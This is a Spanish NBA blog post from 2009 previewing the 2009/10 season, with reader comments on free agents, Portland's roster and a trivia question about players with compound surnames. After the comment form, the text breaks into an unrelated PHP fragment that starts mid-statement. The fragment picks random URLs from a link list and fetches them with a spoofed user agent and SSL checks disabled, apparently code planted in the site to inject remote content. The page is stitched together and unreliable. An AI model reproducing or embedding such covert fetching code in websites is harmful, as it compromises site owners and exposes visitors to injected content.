Análisis 2009/2010

26 de September de 2009 por TheDeerHunter

Mañana será 27 de Septiembre. Quedarán exactamente 30 días para el inicio de la competición, justo el número de contendientes que conforman la NBA.

Como ya es tradición en nuestro blog, nos disponemos a analizar todas y cada una de las franquicias, sus principales novedades, sus aspiraciones y sus posibilidades reales. Esperamos que estas reflexiones nos sirvan de aperitivo a la espera del delicioso plato principal, que tantas horas nos quitará de sueño. Dándonos una idea de todo lo que nos espera este curso baloncestístico.

No olvidemos que no se trata más que de un pronóstico subjetivo, completamente opinable, sujeto a vuestras discrepancias y comentarios. Os invitamos a que participéis de las mismas debatiendo, corrigiendo y/o completando como os parezca todo nuestro trabajo. Recordad también que, de aquí a Febrero suelen sucederse todo tipo de traspasos y alteraciones, que bien pueden distorsionar en distinto grado cualquier previsión.

Iremos actualizando esta entrada con los enlaces a los diferentes análisis que se vayan publicando.

Comenta

8 comentarios a esta entrada

  1. NBA LAKERS BLOG dice:
    #1

    De ser así, me veras por aquí comentando y opinando acerca de tus reflexiones 😉

    Ya llega la NBA! Ya se viene!

    Un fuerte abrazo! Pasate por nuestro blog de los Lakers!

    –NM–

      Citar

  2. L.Casei dice:
    #2

    Interesante información la de Marca respecto a los jugadores sin equipo a estas alturas. Hacen una lista, pero hay que distinguir los que están buscando equipo de los que están tensando la cuerda para lograr un mejor contrato, como el caso de Wally:
    “En la NBA hay algunos nombres la mar de interesantes que no tienen equipo y que podrían encontrar buen acomodo en Europa. Algunos son veteranos que ni siquiera se sabe si seguirán jugando, pero otros son nombres todavía valiosos. En todos los casos, es la crisis económica la que ha facultado que haya gran cantidad de jugadores sin equipo, al acortarse la mayoría de las plantillas.
    Stephon Marbury, si es que quiere continuar su carrera (en la misma semana dijo que sí y que no), podría ser uno, pero hay otros nombres que han sido importantes en la Liga: Jerry Stackhouse, Jamaal Tinsley, Wally Szczerbiak, Lorenzen Wright, Gerald Green, Mark Madsen, Chris Mihm, Darius Miles, Chucky Atkins, Tyronn Lue, Salim Stoudamire, Damon Jones, Greg Buckner, Melvin Ely, Robert Swift, Bobby Jackson, Stromile Swift, Malik Rose, Brevin Knight o Donyell Marshall son algunos de ellos.”

    Más cositas. Portland ha probado a varios veteranos para copar algún puesto pendiente del “roster”, sobre todo para la posición de “4”. Entre ellos, Stromile Swift (29), Juwan Howard (36) o Zendon Hamilton (34), este más “5”, que juega en Rusia y ya estuvo unas semanas en la plantilla de los Blazers en 2006, sin llegar a jugar. Finalmente, se queda Juwan, para añadir más experiencia junto a Andre Miller. La necesitaban. Howard firma sólo por un año (garantizado).
    Y mientras, Carlos Arroyo sigue sin poder concretar acuerdo alguno con algún equipo de la NBA. Mientras espera, hace sus primeros pinitos en el mundo de la canción…

      Citar

  3. L.Casei dice:
    #3

    Una pregunta alternativa jeje (sencillita) que hicieron durante un partido de NBA la temporada pasada para mantener al personal hasta el final de la retransmisión (lo llaman “quiz”):
    En la 08/09 hubo tres jugadores en la NBA con apellidos compuestos. ¿Cuáles son?.
    Yo me sorprendí a mí mismo porque la supe responder rápidamente…

      Citar

  4. Kiki dice:
    #4

    Pues ya está cubierto el puesto que le faltaba a Portland en los 15 del roster: ha firmado un contrato no garantizado al alero Ime Udoka, ex Spurs y es Blazers, y antes en LAL y NY, como recordáis. Más veteranos para compensar, equilibrar y potenciar el equipo. Y dentro del “salary cap”.
    Vaya plantilón. Pena de las lesiones de los picks del draft, Patrick Mills y Jeff Pendergraph (este último con sitio en el roster, aunque no se sabe cuánto deberá estar de baja). Y Cunningham va a sorprender, vaya físico.

      Citar

  5. L.Casei dice:
    #5

    Bueno, por si le interesa a alguien o teníais curiosidad, los 3 jugadores con apellidos compuestos son:

    – D.J. ILUNGA-MBENGA (LAL).
    – L. MBAH a MOUTE (MIL).
    – C. DOUGLAS-ROBERTS (NJN).

    Saludos.

      Citar

  6. MagicJohnson32 dice:
    #6

    Parece que lo de tener apellido compuesto está reñido con saber meter canastas de más de 6 metros, jeje.

      Citar

  7. JR dice:
    #7

    A bote pronto no me vino el rookie de UCLA pero sí Pops Mensah bonsu, aunque tal vez se incorporó a los Spurs después de que se formulara la quiz.

    Saludos

      Citar

  8. Love Denise dice:
    #8

    hola, acabo de descubrir este blog y foro sobre la nba, y me ha encantado conocerlo, todos los que escribis aquí teneis grandes conocimientos baloncestisticos, tanto los que hacen la web, como los que comentais en ella.

    Para mí, el mejor equipo este año son llos Magic, con un gran quinteto, y muchas posibilidades en el banquillo, a deiferencia de Lakers.
    Cavs y Celtics tambien tendran sus oportunidades de luchar por el anillo, pero dependerá de la salud de O’Neal, y del cuarteto garnett, Ray, Pierce y Rasheed, respectivamente.
    Un saludo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>